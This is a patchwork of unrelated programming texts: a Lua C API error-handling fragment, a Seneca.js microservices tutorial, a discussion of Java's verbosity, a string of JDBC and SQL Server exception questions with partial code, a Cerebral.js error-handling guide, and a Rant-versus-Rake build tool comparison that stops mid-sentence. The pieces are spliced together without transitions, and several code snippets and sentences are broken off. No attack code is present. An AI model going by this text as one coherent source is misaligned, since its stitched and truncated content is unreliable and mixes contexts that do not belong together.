full userdata) may throw a memory error. None of the type enquiry functions -- lua_is*, lua_typeand lua_typename-- will ever throw an error, and neither will the functions which set/get metatables and environments. lua_rawget, lua_rawgetiand lua_rawequalwill also never throw an error. Aside from lua_tostring, none of the lua_to*functions will throw an error, and you can avoid the possibility of lua_tostringthrowing an out of memory error by first checking that the object is a string, using lua_type. lua_rawsetand lua_rawsetimay throw an out of memory error. The functions which may throw arbitrary errors are the ones which may call metamethods; these include all of the non-raw getand setfunctions, as well as lua_equaland lua_lt. __gcmetamethod. Then you should create the object which may need to be freed and put it in the userdata. This will avoid resource leaks because the __gcmethod will eventually be called if an error is subsequently thrown. A good example of this is the standard liolib.cwhich uses this strategy to avoid leaking file descriptors. -- RiciLake
https://lua-users.org/wiki/ErrorHandlingBetweenLuaAndCplusplus
CC-MAIN-2021-25
refinedweb
1,095
54.63
Quick Intro to Node.JS Microservices: Seneca.JS What is microservices architecture?What is microservices architecture? These days, everyone is talking about microservices, but what is it really? Simply said, microservices architecture is when you separate your application into smaller applications (we will call them services) that work together. I have found one awesome image that represents the difference between monolith and microservices apps: Picture above explains it. On the left side we see one app that serves everything. It's hosted on one server and it's usually hard to scale. On the right side, we see the microservice architecture. This app has different service for each functionality. For example: one is for user management (registration, user profiles...), second one for emails (sends emails, customises templates..), third one for some other functionality.. These services communicate using API (usually send JSON messages) and they can be on same server. But the good thing is that they can be spread through different servers or Docker containers. How can I use NodeJS to make microservices architecture?How can I use NodeJS to make microservices architecture? So, you want to use NodeJS to create microservices architecture? That's very simple and awesome! In my career, I've used many frameworks and libraries for creating microservices architecture, even created custom libraries (don't do it!) — until I found SenecaJS. To explain what Seneca is, I will quote the official website: Seneca is a microservices toolkit for Node.js. It helps you write clean, organized code that you can scale and deploy at any time. Simple! Basically, it helps you exchange JSON messages between your services and have good looking and readable codebase. Seneca uses actions. There are action definitions and action calls. We can store our action definitions inside our services and call them from any service. For understanding how Seneca works, you need to think about modular pattern and avoid the desire to put everything inside one file. I am going to show you how it works! Let's play!Let's play! For this tutorial, we are going to build a simple app. Yay! First, let's create simple a NodeJS app: npm init It will go through installation and install this: Then, we will install Seneca: npm install seneca --save It will install all modules we need and we can just require Seneca and use it. Before we start, let me explain a couple more things to you. There aren't any conventions about what we should put inside our JSON objects, but I have found out that lot of people use the same style. I am using this one {role:'namespace', cmd:'action'} and I recommend you to stick to this one. Creating a new style can lead to problems if you work in a team. Role is the name of group of functions and cmd is the name of the action. We use this JSON to identify which function we are going to use. I will create two files, index.js and process.js. index.js will send a request to process.js with some numbers, sum it up, then return result. The result will be written in console from index.js file. Sounds good? Let's start! Here is the code from process.js: module.exports = function( options ) { var seneca = this; seneca.add( { role:'process', cmd:'sum' }, sum ); function sum ( args, done ) { var numbers = args.numbers; var result = numbers.reduce( function( a, b ) { return a + b; }, 0); done( null, { result: result } ); } } Here, we define the function sum and add to Seneca using the seneca.add function. The identifier is { role:'process', cmd:'sum' }. sum calls the done function and sends the result object. The Seneca function returns objects by default, but it can be customized to return string, or number, too. Finally, here is the code from index.js: var seneca = require('seneca')(); seneca.use( './process.js' ); seneca.act( { role: 'process', cmd: 'sum', numbers: [ 1, 2, 3] }, function ( err, result ) { console.log( result ); } ) As you can see, we use seneca.use to tell Seneca that we are going to use process.js file and that we defined our function there. In the next lines, we use seneca.act to call the function from process.js. We are sending the JSON object with role and cmd, along with the arguments numbers. The object result is returned and it should contain our result. Let's test it: node index.js Woohoo, it works! It returned { result: 6 } object and that's what we expected! ConclusionConclusion Seneca is awesome, it has big a potential and you can create more complex apps with it. You can run multiple node processes and use the same services in process and a lot of other cool stuff. I will write more about this topic. Stay tuned! I hope you liked this introduction and tutorial to Seneca.js! If you want to learn more about it, you can check out SenecaJS website and their API page:. I am writing articles like this one on.
https://www.codementor.io/ivan.jovanovic/introduction-to-nodejs-microservices-senecajs-du1088h3k
CC-MAIN-2018-05
refinedweb
838
76.93
HackerRank in Swift - StdIn [OUTDATED] A way to read standard input for HackerRank assignments in Swift. HackerRank is an amazing resource. It features lots of programming assignments from multitude of domains. This is a perfect place to prep yourself up for upcoming interview, to improve your problem solving skills and even to learn a new language. For all those who follows Swift programming language closely, it is now supported by HackerRank. So if you are desperate to write some Swift code and don’t have any real projects to apply it, HackerRank might be an excellent place to do just that. Well, Swift support with HackerRank has been on and off lately. Few months after I wrote this post Swift 1.2 was released, few days later it disappeared from HackerRank. Probably they have problems catching up with Swift development schedule. In any case you can still solve the problems in Swift and then submit them in bulk once HackerRank engineers get it working. Most (if not all) of the assignments require reading data from standard input. The format is usually like this. <N> <test-case-1> <test-case-2> ... <test-case-N> In this example N is total number of test cases. It is then followed by N lines each corresponding to an input for a test case. This is common, but not the only way to provide input. Some assignments would have 2-line test cases or other format. In any case, one common feature between all assignments is that you need to read data line by line. So let’s start with implementation of core getLine function in Swift. Get Line import Foundation // MARK: Standard Input /// Reads a line from standard input ///:returns: string form stdin public func getLine() -> String { var buf = String() var c = getchar() // 10 is ascii code for newline while c != EOF && c != 10 { buf.append(UnicodeScalar(UInt32(c))) c = getchar() } return buf } The code is straightforward. - Declare bufvariable used to accumulate the result string. - Declare cvariable used to read next character from stdin with getchar - Loop until reach the end of file ( EOF), or newline (ASCII code 10) - On each iteration append newly read character to the accumulator string You’ve probably heard lots of things about Swift. Among all the things, one very important feature is its interoperability with Objective-C and C languages. This small code snippet isn’t a 100% “pure” Swift code. First of all, it’s using getchar function from C Standard Library made available via Foundation framework import. No worries though, all these APIs are toll-free bridged to Swift. This also explains a chain of initializers / type-casts when appending new character to accumulator string. getchar() returns ASCII code of the character of Int32 type. The thing is that Swift’s String is not your good old ASCII null-teminated C string, it is actually a collection of Unicode scalars. Bear in mind, that collection isn’t just a figure of speech, it actually means that String type conforms to CollectionType protocol. Anyway, to create an instance of UnicodeScalar you need to have a value of UInt32 type, hence the conversion of c to UInt32. An important note. This code will not work properly with actual Unicode input. Anything outside of standard ASCII table will be rendered as some gibberish. Obviously getcharis not up for the job of reading unicode characters. However, on HackerRank you would never get non-ASCII input (at least for assignments that I saw), so this function does perfect job for its targeted application area. Read Line Now when you can get a line, next thing you will want is to convert that line into something else. For example, if the line is just one integer, you would like to convert into a value of Int type. It it’s a list of integers (space- or comma-, or whatever- separated), you would obviously want to convert it to Array<Int> or [Int]. And so on and so forth. I am actually inspired by Haskell here. It has a core getLine function to get a line as string, then it also has readLn method, which doesn’t just get the line, but also allows converting it into a value of desired type. -- Haskell -- Read a line and convert to IO Int n <- readLn :: IO Int -- Get a line and convert (read) it as array of Int line <- getLine let input = read line :: [Int] So I wanted to have something similar or alike to use in Swift. This is one of solutions. /// Read line from standard input ///:returns: string public func readLn() -> String { return getLine() } /// Read line from standard input and convert to integer ///:returns: integer value public func readLn() -> Int { return getLine().toInt()! } /// Read line and convert to array of strings (words) ///:returns: array of strings public func readLn() -> [String] { return getLine().componentsSeparatedByCharactersInSet(NSCharacterSet.whitespaceCharacterSet()) } /// Read line and convert to array of integers ///:returns: array of integers public func readLn() -> [Int] { let words: [String] = readLn() return words.map { $0.toInt()! } } Let’s review each function. public func readLn() -> String - This is really just an alias for getLine()as you can clearly see from its implementation. public func readLn() -> Int - This function gets the line and converts it to Intusing toInt()method. Since toInt()returns an optional, we have to use explicit unwrapping ( !operator). Needless to say that if the string can’t be parsed into an integer, the code will crash. public func readLn() -> [Strings] - Get the line and parse it into an array of strings. It works from the assumption that default separator is whitespace. Luckily, this is the case with all HackerRank assignments I’ve seen so far. It’s possible to improve this function and pass custom separator string as an argument. public func readLn() -> [Int] - Get the line and parse it into an array of integers. You might have thought that this function kind of calls itself. Of course it’s not true and there’s no recursion here. Because the line let words: [String] = readLn()explicitly specifies the type of the wordsconstant, Swift compiler calls the public func readLn() -> [String]function matching the [String]type of words. Once it gets an array of strings, it maps each value to its integer counterpart with toInt()call. Obviously, you can define as many readLn functions as you wish, but the sane thing to do is to define new function when particular assignment requires it. For example, somewhere down the middle of Warmup section in Algorithms domain, you will need a function like this. // An array of (Int, String) tuples public func readLn() -> [(Int, String)] { // ... } Generics? OK, so when you see 4 readLn functions that differ by return type only, what does the common sense tell you? And what does each and every functional programming text book recommend in this case? Right - use generics. But hold on, this is probably the case where generics wouldn’t work right away (I’d be happy to be proven wrong). Generics really work well when lots of functions differ only in types they use, but still have the same implementation details. In this case, each readLn implementation is specific and there aren’t lots of common patterns to be reused. Let’s have a pseudo-code-thought experiment though. public func readLn<T>() -> T { // Not a real Swift code! switch T { case String: return getLine() case Int: return getLine().toInt()! case [String]: return getLine().componentsSeparatedByCharactersInSet(NSCharacterSet.whitespaceCharacterSet()) case [Int]: let words: [String] = readLn() return words.map { $0.toInt()! } default: return getLine() } } Now, this is not a real code and would never compile. The reason is that there’s no simple way to do a switch by the type T. I have found an ugly way to work around this limitation. public func readLn<T>() -> T { if (T.self as? String.Type != nil) { return getLine() } else if (T.self as? Int.Type != nil) { return getLine().toInt()! } else if (T.self as? [String].Type != nil) { return getLine().componentsSeparatedByCharactersInSet(NSCharacterSet.whitespaceCharacterSet()) } else if (T.self as? [Int].Type != nil) { let words: [String] = readLn() return words.map { $0.toInt()! } } else { return getLine() } } The conditions for ifs are actually a valid Swift code, though they don’t look pretty. The code still doesn’t compile. The problem is that each return statement returns one of these types: String, Int, [String] or [Int], and compiler doesn’t know how to initialize an instance of type T with any of these types. Compiler doesn’t really know anything about T, but it does know that T gives no guarantee to provide init(_: Int) or any other initializer. What you could do next, is to try to come up with a protocol which T would conform to. Pack all these initializers inside the protocol, and then much more; and probably this path of generic functional madness would take you somewhere after all. But look at this from another angle: even if you succeed in making this generic function to compile and work, you effectively have implementations of each and every separate functions sitting right there, each in its own if-clause. So what’s the point then? My personal takeaway from this exercise is: do not overcomplicate things. Just think of a group of N different readLn functions as some single abstract generic function. After all, when you use it in code, that’s exactly how it looks and works. Use Finally, after all this abstract talk, it is time to put these standard input functions to a good use. Let’s start with Solve me first. Here’s the solution in Swift. let a: Int = readLn() // calls readLn() -> Int, because a is of Int type let b: Int = readLn() println(a + b) To test it, make a simple solve-me-first-tc0.txt file with test input. 2 3 Then run this command in the terminal. # Mac OS X 10.9+ cat solve-me-first-tc0.txt | xcrun swift solve-me-first.swift # Mac OS X 10.10+ cat solve-me-first-tc0.txt | swift solve-me-first.swift As expected, the output is 5 and you’ve just got your first assignment solved in Swift. While we are at it, let’s solve the Solve me second. You have to read an array of integers from each line and sum them up. Calculating the sum of all elements in an array is a text book example of using reduce method. let n: Int = readLn() for _ in 0..<n { let ints: [Int] = readLn() // calls readLn() -> [Int] let sum = ints.reduce(0, +) println(sum) } Now, if you are one of fresh functional programming converts, you might frown at the for-loop. I had the same feeling originally. Reading a lot about functional approach made me think that any for-loop should be effectively replaced with map, reduce or filter. But is it really so? Swift does have a number of features which are part of functional programming paradigm, but that doesn’t mean that for-loop is now banned from use. For-loop is one of the native Swift idioms and does have its own use where appropriate. As an example, check this post and related discussion on Apple Developers forum. Summary You now have a handy stdin Swift library to get you going with most of assignments. If you are not a big fan of copy-pasting these functions each time, check out my other posts about HackerRank makefiles and reusing Swift IO library.
https://mgrebenets.github.io/hackerrank/2015/03/15/hackerrank-in-swift-io
CC-MAIN-2019-39
refinedweb
1,915
65.32
Python is a language known for its simplicity and clean syntax. Python programs usually have lesser lines of code than other programming languages. Now, lets learn some Python tips and tricks to make your code even more readable and shorter. To download these Python tips and tricks as PDF, skip to the bottom of this post. 1. Python program to swap two numbers This is one of the basic programs every newbie programmers will learn. The most common way of swapping two variables by using a third variable. In fact, there are a couple of other ways to swap two numbers. 1. Using a third variable a = 5 b = 6 c = a a = b b = c 2. The Pythonic way a, b = 5, 6 a, b = b, a 2. Reverse of a string x = "Hello World" print(x[::-1]) Output: dlroW olleH 3. Python program to generate a list of numbers up to x limit = int(input("Enter the limit: ")) l = [x for x in range(limit+1)] print(l) This is known as list comprehension. Output: Enter the limit: 5 [0, 1, 2, 3, 4, 5] 4. Python assignment expression) 5. Multiply a string Hey, you can multiply strings in Python. print("Geekinsta " * 3) Output: Geekinsta Geekinsta Geekinsta 6. Sort a list based on custom key Following) 7. Check if a string exists in another string There are several methods to do this. x = "Hi from Geekinsta" substr = "Geekinsta" # Method 1 if substr in x: print("Exists") # Method 2 if x.find(substr) >=0: print("Exists") # Method 3 if x.__contains__(substr): print("Exists") 8. Shuffle the items of a list How do you usually shuffle the items in a list? Most of the Python beginners will be using a loop to iterate over the list and shuffle the items. But python has an inbuilt method to shuffle list items. To use this method, we should first import random module. from random import shuffle l = [1, 2, 3] shuffle(l) print(l) You will get different outputs each time you run the code. 9. Create string from a list With the join method Python, we can easily convert the items of a list to string. l = ['Join', 'this', 'string'] print(str.join(' ', l)) 10. Pass list items as arguments In Python, you can pass the elements of a list as individual parameters without specifying it manually by index using the * operator. This is also known as unpacking. l = [5, 6] def sum(x, y): print(x + y) sum(*l) 11. Flatten a list of lists Usually, we flatten a list of lists using a couple of nested for loops. Although this method works fine, it makes our code larger. So, here’s a shorter method to flatten a list using the itertools module. import itertools a = [[1, 2], [3, 4]] b = list(itertools.chain.from_iterable(a)) print(b) 12. Interchanging keys and values of a Dictionary Python allows you to easily swap the keys and values of a dictionary using the same syntax we use for dictionary comprehension. Here’s an example. d = {1: 'One', 2: 'Two', 3: 'Three'} di = { v:k for k, v in d.items()} print(di) 13. Using two lists in a loop We normally use the range() function or an inerrable object to create a for loop. We can also create a for loop with multiple interactable objects using the zip() function. keys = ['Name', 'age'] values = ['John', '22'] for i, j in zip(keys, values): print(f'{i}: {j}') 14. Create a dictionary from two lists We can combine the elements of two lists as key-value pairs to form a dictionary. Here’s an example. keys = ['Name', 'age'] values = ['John', '22'] d = {k:v for k, v in zip(keys, values)} print(d) 15. Pass dictionary items as a parameter The key-value pairs of a dictionary can be directly passed as named parameters to any function in the same way we passed a list before. d = {'age': 25, 'name': 'Jane'} def showdata(name, age): print(f'{name} is {age} years old') showdata(**d) Download Python Tips and Tricks PDF We’ll be regularly updating this article more such tips and tricks to make your code shorter and readable.
https://www.geekinsta.com/python-tips-and-tricks/
CC-MAIN-2020-40
refinedweb
706
74.39
print in color easily! Project description Orchid66: print colorful stuff nicely yeah just, print colorful stuff nicely Note: currently only supports linux example: from orchid66 import printn printn("this is in *red*, and this is in *blue*", ('red', 'blue')) printn("I like *green* && *blue*", ('green', 'blue')) green_in_blue = ('green', 'blue') # notice tuple in tuple in second parameter printn("I like *green in blue*", (green_in_blue,)) # with tuples red = (255, 0, 0) blue = (50, 50, 255) green = (50, 255, 50) printn('this word is in *red*, and this is in *blue*', (red, blue)) example gif: installation through pypi pip install orchid66 by cloning the repository - clone this repository - change the current directory into this repository - execute pip install . supported colors all X11 colors in orchid66s' mini language text between *is rendered as colored, except when preceded by a & &*refers to a single *that is rendered &&refers to a single &that is rendered Project details Download files Download the file for your platform. If you're not sure which to choose, learn more about installing packages. Source Distribution orchid66-1.1.6.tar.gz (9.9 kB view hashes)
https://pypi.org/project/orchid66/
CC-MAIN-2022-21
refinedweb
185
50.5
gl_bcircle man page gl_bcircle — draw a filled or unfilled Bresenham circle Synopsis #include <vgagl.h> void gl_bcircle(int x, int y, int r, int c, int fill); Description Draw a Bresenham circle of radius r in color c , centered at ( x , y ). Fill should be 0 for a hollow circle, or any other value for a solid color. This function differs from gl_circle (3) and gl_fillcircle (3) in that it looks good in 320 x 200 screen modes. The modified algorithm was provided by Chris Atenasio <chris@svgalib.org>, and is based upon Bresenham's formula. Note that the "circle" is technically an ellipse, and is actually wider than it is tall. Therefore, r is equal to the circle's height, but is less than its width. This distortion is necessary to accomodate the 8:5 aspect ratio (e.g., 320 x 200). I don't recommend using this function in standard 4:3 screen modes (e.g., 640 x 480 and higher). Furthermore, care must be taken so that a circle drawn with this function isn't copied to a screen with a different aspect ratio. Otherwise, the result may be undesirable. See Also svgalib(7), vgagl(7), svgalib.conf(5), threedkit(7), testgl(1), plane(1), wrapdemo(1), gl_circle(3), gl_clearscreen(3), gl_colorfont(3), gl_disableclipping(3), gl_enableclipping(3), gl_fillbox(3), gl_fillcircle(3), gl_hline(3), gl_line(3), gl_setclippingwindow(3), gl_setpalette(3), gl_setpalettecolor(3), gl_setpalettecolors(3), gl_setpixel(3), gl_setpixelrgb(3), gl_setrgbpalette(3), gl_setwritemode(3). Author This manual page was written by Jay Link <jlink@svgalib.org>.
https://www.mankier.com/3/gl_bcircle
CC-MAIN-2018-39
refinedweb
256
50.02
/** * */ package ORM; import java.sql.Connection; import java.sql.DriverManager; import java.sql.SQLException; /** * @author Gwilym * @version 0.0 */ public class DatabaseConnection { private String userName=""; private String password=""; private String host=""; Connection ... I'm getting a strange error from the SQL Server JDBC driver. It is telling me that a column name is invalid even though the column is present, correctly named and the ... When using ANT to build my Java application I keep getting this error. I have tried multiple times to use SQLJDBC.JAR and SQLJDBC4.JAR but continually receive this error message. I am ... I'm getting the following exception in my log when I try to perform an XA transaction: javax.transaction.xa.XAException: com.microsoft.sqlserver.jdbc_SQLServerException: failed to create the XA control connection. Error: "The EXECUTE permission was ... I have this error/exception- SQL Exception: com.microsoft.sqlserver.jdbc.SQLServerException: The TCP/IP connection to the host localhost, port 1433 has failed. Error: "connect timed out. Verify the connection properties, check that an instance of SQL ... import java.sql.*; import java.awt.event.*; import javax.swing.*; import java.awt.*; class student extends JFrame implements ActionListener { JTextField tf,tf1,tf3,tf4,tf5,tf6,tf7,tf2,tf8; Connection conn = null; PreparedStatement ins,del,upd,sel; student() throws Exception { super("STUDENT MANAGEMENT"); String userName = "root"; ... package CrimeFile; import com.sun.rowset.JdbcRowSetImpl; import java.sql.SQLException; import java.util.logging.Level; import java.util.logging.Logger; import javax.sql.rowset.JdbcRowSet; /** * * @author singgum3b */ public class test { /** * @param args the command line arguments ... I am getting this error when i am trying to index a table from database on sql server: SEVERE: Exception while processing: APPLICATION document : SolrInputDocument[{}]:org.apache.solr.handler.dataimport.DataImportHandlerException: Unable to execute query: select APP_ID ... I use callable interface of Java and try to read the output variable value of a stored procedure written in SQL server. Stored procedure: callable CREATE PROCEDURE [Get_Project_Name_Test] ... I have reviewed my question and made some changes. public class SQLCONC { public static Connection Conn; public static Connection getConnection() ... Hi, I use JDBC/SQLServer 2000 with the last version of MS Driver. My insert start a trigger. My insert is in a Batch. I use executeBatch The insert is not executed (because of the bad trigger). My problem is that : - no exception is thrown, - the returned int[] contains only '1'. Please have you informations about ??? Thanks. Hi I have a stored procedure in SQL server 7 which takes a parameter and executes the query . It looks like BEGIN EXEC('DELETE FROM #TMPTable WHERE NEDevice NOT IN ('+@DeviceFilter+')') END and the DeviceFilter value will be passed as 'value1','value2',............. But if the length of that parameter exceeds 128 , its throwing an exception saying Identier is too long , ... I am using follwoing query SELECT Fax.* FROM Fax INNER JOIN FaxAccess ON Fax.DocumentNumber = FaxAccess.DocumentNumber WHERE FaxTypeId = 2 AND isPublic = 0 AND (FaxAccess.UserAccess LIKE '\Seattle\Police\Detective%' ) UNION SELECT Fax.* FROM FAX WHERE FaxTypeId = 2 AND Fax.isPublic = 1 and both queries return same columns independently but I get following error when I execute the queries with union ... The standard SQL server connection error (socket based) checklist includes... - is the server where you think it is (have you specified the right host) - is there a firewall anywhere that is eating this (previously suggested but check for firewall problems on all of the client, the server and any network device in between) - is SQL Server set up ... I would really appriciate if someone can help me fix my problem. I have 2 instances of Tomcat running. One is a Tomcat 5.5.12 and the others a 5.5.15. I have a JDBC application which queries a SQLSERVER 2000 and writes the tables to an OracleDataSource. I have both the datasources in my '\conf\Catalina\localhost\"webapp".xml file.The 5.5.15 instance runs fine and does ... Hi, I've installed sql server 2000 in my local machine and I'm trying to connect thro' sql server 2005 jdbc from my application. I've installed quantum db plugin for myeclipse which is a database tool and i was able to connect to the sql server 2000 and could pull my tables. I use the same configuration (driver name, connection url,etc) and ... A data that is passed in where clause in SQL has a quote as: my'value Not using prepared statement. String sql = "Select * from myTable Where colValue = '" + val + "'"; val passed in from a command line. Value of val variavle has a quote as my'value. Exception is thrown when quote is encountered in the value of ... public static void main(String[] args) { connection = getConnection(); // this one is fine Connection connection2 = getConnection(); // at this line gives error } public static Connection getConnection() { Connection connection3 = null; try { Class.forName(driver).newInstance(); connection3 = DriverManager.getConnection(url, userName, password); System.out.println("Connected to the database at :" + new Date()); } catch (Exception e) { e.printStackTrace(); } return connection3; } ... Hi All, I have created a system DSN using ODBC administrator to connect to SQL Server 2008 database using SQL Server Native Client 10.0. My system configuration is : Windows Server 2008 R2 64 bit SQL Server 2008 64 bit JDK 6.0.18 64 bit Now when I try to connect to database using this DSN and JDBC-ODBC bridge, I get the ... Hi Friends, Here my problem is "java.sql.SQLException: [Microsoft][SQLServer JDBC Driver]System Exception: Connection reset by peer: socket write error ". I'm receiving the above error from my application. ( i.e )my application is communicating with Sql Server continously, and there is no request for a long time from my application to SqlServer and if i tried any request to Sql Server. im ...
http://www.java2s.com/Questions_And_Answers/Java-Database/SQLserver/exception.htm
CC-MAIN-2018-39
refinedweb
953
51.44
On Mon, Dec 05, 2011 at 10:38:49AM -0700, Eric Blake wrote: > Over time, Fedora and RHEL RPMs have often backported upstream > patches that touched configure.ac and/or Makefile.am; this > necessitates rerunning the autotools for the patch to be effective. > Making this part of the spec file will make it easier for future > backports to pull patches without thinking about this issue. > > * libvirt.spec.in (BuildRequires): Add autotools. > (%build): Use them before configure. > --- > libvirt.spec.in | 4 ++++ > 1 files changed, 4 insertions(+), 0 deletions(-) > > diff --git a/libvirt.spec.in b/libvirt.spec.in > index 06c949b..462421a 100644 > --- a/libvirt.spec.in > +++ b/libvirt.spec.in > @@ -334,6 +334,9 @@ Requires: libcgroup > %endif > > # All build-time requirements > +BuildRequires: autoconf > +BuildRequires: automake > +BuildRequires: libtool > BuildRequires: python-devel > %if %{with_systemd} > BuildRequires: systemd-units > @@ -721,6 +724,7 @@ of recent versions of Linux (and other OSes). > %define init_scripts --with-init_script=redhat > %endif > > +autoreconf -if > %configure %{?_without_xen} \ > %{?_without_qemu} \ > %{?_without_openvz} \ NACK, we really shouldn't do this by default IMHO - regenerating autotools has not always been foolproof when newer autotools are released. If we want to include this for help of downstream, then it should be protected by a conditional statement, so it is off by default and you can set %define enable_autoconf 1 at the top of the spec to turn it on. Regards, Daniel -- |: -o- :| |: -o- :| |: -o- :| |: -o- :|
https://www.redhat.com/archives/libvir-list/2011-December/msg00230.html
CC-MAIN-2018-22
refinedweb
228
57.27
Richard Golebiowski wrote:20 years ago they were saying that programmers would not be needed soon. Pat Farrell wrote:Where is the creativity? Where is the leap in productivity? Gregg Bolinger wrote:Here's my biggest problem with Java and teaching it to someone new to programming: public class HelloWorld { public static void main(String[] args) { System.out.println("Hello, World"); } } David Newton wrote:Nothing you have said addresses anything I said: I never said it wasn't used, I never said it wasn't less complicated than C++ (in fact I said it *was* less complicated), or that it had less scope. I also said it was fast--but it used to be as slow or slower than Smalltalk. I have very specific issues with Java--if you want to address those, okay, but stick to things I actually said. Oh! i can't accept that . Depends on what you mean: verbosity is most certainly one type of complexity. The more there is to take in the more cognitive overhead there is. The more the problem is being obscured by the solution the more cognitive overhead there is. One of Java's greatest weaknesses (to me) is that every solution looks like Java--not like the problem I'm trying to solve. This is somewhat alleviated by static imports, foreach, etc. but remains wrecked by reflection and lack of first-class functions. Workarounds require enough additional code to make the tradeoff questionable. Deepak Bala wrote:[One could argue that writing many small methods makes the code more verbose. David Newton wrote: Deepak Bala wrote:[One could argue that writing many small methods makes the code more verbose. But it couldn't be argued very well, since the number of moving parts is nearly identical. Arun Giridharan wrote:Oh! i can't accept that . Jesper Young wrote: Java the language is not very complicated at all, and it's much simpler than C++ (which does have a lot of intricate pitfalls). I don't see the need for a language that's "simpler" than Java. If it's not the language itself he's talking about, but the ecosystem around it (with the thousands of libraries and frameworks) - that's what I regard one of the greatest strengths of Java: you can get a library or framework for anything, and you often have choice between multiple implementations. If Go would ever become popular, then it will grow as well, new language features will be added and lots of people will be writing libraries and frameworks in it, and after a while it will be just as "complex" as Java. I see that I'm not the only one with this idea: David Newton wrote: Arun Giridharan wrote:Oh! i can't accept that . Accept what? That Java isn't a good language for organic exploration?! If so, you'll need to back that up with something other than simple disagreement, and figure out a way to refute common sense and experience. Java is a *terrible* language for exploration, because it takes too long to explore, and there's too much ceremony. In a language with a REPL people can just *begin*. With Java there's *way* more to it just to get *started*, let alone doing anything useful. Try this experiment: drop a kid in front of a computer and tell him to start having fun in a Java environment. Now tell him to start having fun with, say, Logo. Now go off and read the studies of using Logo in the classroom and check out what *kids* are doing, then tell me how much luck they'd have doing the same thing in Java. Then perhaps you'll understand what I'm trying to say. Ever see Why's Ruby-based interactive learning environment? That's just Ruby. In order to even get close with Java you need to go with something like BlueJ, and even that is targeted at high school and college age students. Java is neither designed, nor appropriate, for introductory programming instruction. Nor advanced programming instruction, because you simply cannot *teach* some concepts with it that you can with many other higher-level languages. Arun Giridharan wrote:IF you have better imagination ..... please let us know ! !
http://www.coderanch.com/forums/posts/list/40/504671
CC-MAIN-2014-10
refinedweb
711
72.26
I am currently working with the web2py frame work and creating a similar website as to (its just a uni project). One of the function I need to write is the searchFlights function where I have created a custom HTML form which allows users to select dates, location etc etc.. The HTML is meant to send this information back to the function defined in the controller... where it then queries the database and returns the flight results... The code for querying the database is: def show(): receivedFlights = request.vars return dict(txt1=recievedflights, flights=db().select(db.Flight.request)) I am currently getting an error when i try to search the flights... error is: cannot concatenate 'str' and 'NoneType' objects
http://www.dreamincode.net/forums/topic/307348-typeerror-cannot-concatenate-str-and-nonetype-objects/
CC-MAIN-2018-05
refinedweb
120
65.73
Handling complex asynchronous flows is a challenging task for error handling. If things are not done correctly errors can be swallowed and you will have a hard time figuring out why your application does not work. Error handling in Cerebral signals are done for you. Wherever you throw an error, it will be caught correctly and thrown to the console unless you have explicitly said you want to handle it. And even when you do explicitly handle it Cerebral will still show the error in the debugger as a caught error, meaning you can never go wrong. The action in question is highlighted red, you will see the error message, the code related and even what executed related to you catching the error. To catch an error from a signal you can define it with the signal definition: someModule.js export default { state: {}, signals: { // Define the signal as an object somethingHappened: { signal: someSequence, catch: new Map([ [FirebaseProviderError, someErrorHandlingSequence] ]) } } } If you are not familiar with the Map JavaScript API, you can read more here. We basically tell the signal that we are interested in any errors thrown by the Firebase Provider. Then we point to the sequence of actions we want to handle it. An error will be passed in to the sequence of actions handling the error: { foo: 'bar', // already on payload error: { name: 'FirebaseProviderError', message: 'Could not connect', stack: '...' } } In most applications error handling can be handled at a global level. That means you define your signals as normal and you rather define catch handlers on the controller itself: import {Controller} from 'cerebral' import { FirebaseProviderAuthenticationError, FirebaseProviderError } from '@cerebral/firebase' import { HttpProviderError } from '@cerebral/http' const controller = Controller({ modules: {}, catch: new Map([ [FirebaseProviderAuthenticationError, someErrorSequence] [FirebaseProviderError, someErrorSequence], [HttpProviderError, someErrorSequence] ]) }) JavaScript has a base error class of Error. When you create your own error types it makes sense to extend Error. This is only recently supported in browsers, but you can use es6-error to make sure extending errors works correctly. import ES6Error from 'es6-error' class AppError extends ES6Error { constructor(message) { super(message) this.name = 'AppError' } } This allows you to create more specific errors by subclassing: class AuthError extends AppError { constructor(message, code) { super(message) this.name = 'AuthError' this.code = code } // By adding a custom "toJSON" method you decide // how the error will be shown when passed to the // debugger and your catch handler toJSON () { return { name: this.name, message: this.message, code: this.code, stack: this.stack } } } To play around with modules have a look at this BIN.
http://cerebraljs.com/docs/introduction/errors.html
CC-MAIN-2017-34
refinedweb
418
53.71
Rant vs. Rake Since many people (especially Ruby programmers) that know Rake ask for a Rake/Rant comparison, I’ll spend a few paragraphs on this topic. This comparison is for Rant 0.4.8 and Rake 0.6.2. If not stated otherwise, this document assumes a standard Ruby 1.8/1.9 installation without additional libraries (except for Rant and Rake). Feature comparison Generally speaking, Rant has all major features of Rake and more. Especially the following major Rant features aren’t available for Rake: - Optional use of MD5 checksums instead of timestamps. To enable it, one import statement at the top of the Rantfile is enough: import "md5" - Easy and portable tgz/zip file creation on Linux/MacOS X/Windows (and probably most other platforms where ruby runs). No additional libraries necessary! - Create a script, tailored to the needs of a project, which can be used instead of an Rant installation => Distribute this script with your project and users and other developers don’t need an Rant installation. Try the rant-import command: % rant-import --auto make.rb rant-import reads the Rantfile in the current directory, determines what code of the Rant distribution (and custom imports) is needed and writes a script that supports all required Rant features and depends only on a standard Ruby (1.8.0 or newer) installation to the file make.rb. Users and other developers don’t need an Rant installation anymore. Instead of typing: % rant foo they can type: % ruby make.rb foo - It is possible to split up the build specification into multiple files in different directories. (=> no such thing as "recursive make" necessary). - Dependency checking for C/C++ source files (integrated makedepend replacement). - The —force-run (-a) option forces the rebuild of a target and all its dependencies. E.g.: % rant -a foo Let’s say foo depends on foo.o and util.o. Then the above command will cause a rebuild of foo.o, util.o and foo, no matter if Rant considers these files up to date or not. - Tasks with command change recognition. Example code: import "command" var :CFLAGS => "-g -O2" # can be overridden from commandline gen Command, "foo", ["foo.o", "util.o"], "cc $[CFLAGS] -o $(name) $(prerequisites)" The last two lines tell Rant, that the file foo depends on the files foo.o and util.o and that foo can be built by running the command in the last line ("cc …") in a subshell. If at least one of the following three conditions is met, foo will be rebuilt: - foo doesn’t exist. - foo.o or util.o changed since the last build of foo. - The command (most probably CFLAGS) changed since the last build of foo. - Dependency checking for C/C++ source files import "c/dependencies" # save dependencies between source/header files in the file # "cdeps"; search for include files in "." and "include" dirs gen C::Dependencies, "cdeps" :search => [".", "include"] # load dependency information when Rant looks at a C file gen Action, /\.(c|h)/ do source "cdeps" end Some other goodies: The make method, the SubFile and AutoClean tasks, special variables and more. Most of this is documented in doc/advanced.rdoc Internals - Rake defines many methods (task, file, desc, FileUtils methods, etc.) in the Object class (i.e. accessible from each line of Ruby code) which can get problematic at least if you want to use 